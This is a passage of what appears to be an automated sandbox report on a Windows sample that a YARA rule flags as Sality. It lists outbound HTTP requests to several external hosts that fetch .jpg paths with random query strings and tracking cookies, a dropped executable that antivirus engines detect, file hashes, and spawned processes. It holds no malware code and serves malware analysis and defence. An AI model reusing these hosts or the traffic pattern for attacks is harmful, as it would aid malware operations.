                                  143192.168.2.94985637.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:48.516870975 CEST205OUTGET /images/xs2.jpg?1ebf202e=-684072638 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:49.223248005 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:49 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  144192.168.2.94985737.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:49.239028931 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:49.950459957 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:49 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:49 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  145192.168.2.94985854.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:50.247950077 CEST311OUTGET /images/xs.jpg?2e78457f=1559268094 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0
                                  Jul 5, 2024 08:02:50.976366043 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:50 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159370|1720159259|4|29|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  146192.168.2.94985944.221.84.10580
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:51.047559977 CEST302OUTGET /xs.jpg?356cb59d=1979250507 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0
                                  Jul 5, 2024 08:02:51.542800903 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159371|1720159259|4|29|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  147192.168.2.94986044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:51.809340954 CEST306OUTGET /images/xs.jpg?3b3f41b1=-1631925289 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:52.336535931 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:52 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159372|1720159260|4|29|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  148192.168.2.94986178.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:52.362721920 CEST193OUTGET /xs.jpg?3fc1b58c=-1102317868 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:53.017049074 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:52 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  149192.168.2.94986237.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:53.166032076 CEST205OUTGET /images/xs2.jpg?a0c60b5a=1203532164 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:53.882483006 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:53 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:6
                                  Start time:02:00:53
                                  Start date:05/07/2024
                                  Path:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe"
                                  Imagebase:0x400000
                                  File size:1'233'920 bytes
                                  MD5 hash:99901509A53DFB9C77C1BE4D60763AFC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:9
                                  Start time:02:00:53
                                  Start date:05/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  Imagebase:0xb30000
                                  File size:15'872 bytes
                                  MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 100%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\fontdrvhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"fontdrvhost.exe"
                                  Imagebase:0x7ff6791b0000
                                  File size:827'408 bytes
                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:12
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\dllhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                  Imagebase:0x7ff733cd0000
                                  File size:21'312 bytes
                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:13
                                  Start time:02:00:54
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\fontdrvhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"fontdrvhost.exe"
                                  Imagebase:0x7ff6791b0000
                                  File size:827'408 bytes
                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:14
                                  Start time:02:00:55
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\dwm.exe
                                  Wow64 process (32bit):false
                                  Commandline:"dwm.exe"
                                  Imagebase:0x7ff6f73e0000
                                  File size:94'720 bytes
                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:15
                                  Start time:02:00:56
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                  Imagebase:0x7ff7f0c90000
                                  File size:1'663'328 bytes
                                  MD5 hash:9B8DE9D4EDF68EEF2C1E490ABC291567
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:18
                                  Start time:02:00:57
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:21
                                  Start time:02:01:00
                                  Start date:05/07/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
                                  Imagebase:0x6e0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:22
                                  Start time:02:01:06
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\sihost.exe
                                  Wow64 process (32bit):false
                                  Commandline:sihost.exe
                                  Imagebase:0x7ff700bc0000
                                  File size:111'616 bytes
                                  MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:23
                                  Start time:02:01:10
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:25
                                  Start time:02:01:11
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:26
                                  Start time:02:01:12
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\ctfmon.exe
                                  Wow64 process (32bit):false
                                  Commandline:"ctfmon.exe"
                                  Imagebase:0x7ff7a3870000
                                  File size:11'264 bytes
                                  MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:27
                                  Start time:02:01:12
                                  Start date:05/07/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff633410000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:28
                                  Start time:02:01:15
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:29
                                  Start time:02:01:15
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                  Imagebase:0x7ff663e30000
                                  File size:793'416 bytes
                                  MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:30
                                  Start time:02:01:18
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:31
                                  Start time:02:01:19
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                  Imagebase:0x7ff7df7f0000
                                  File size:3'671'400 bytes
                                  MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:32
                                  Start time:02:01:30
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:33
                                  Start time:02:01:31
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:34
                                  Start time:02:01:31
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\smartscreen.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                  Imagebase:0x7ff6d8c90000
                                  File size:2'378'752 bytes
                                  MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:35
                                  Start time:02:01:32
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\ApplicationFrameHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                  Imagebase:0x7ff674640000
                                  File size:78'456 bytes
                                  MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:36
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                  Imagebase:0x7ff61dec0000
                                  File size:19'456 bytes
                                  MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:37
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  Imagebase:0x7ff73df00000
                                  File size:103'288 bytes
                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:38
                                  Start time:02:01:33
                                  Start date:05/07/2024
                                  Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                  Imagebase:0x7ff6668d0000
                                  File size:19'232 bytes
                                  MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:39
                                  Start time:02:01:35
                                  Start date:05/07/2024
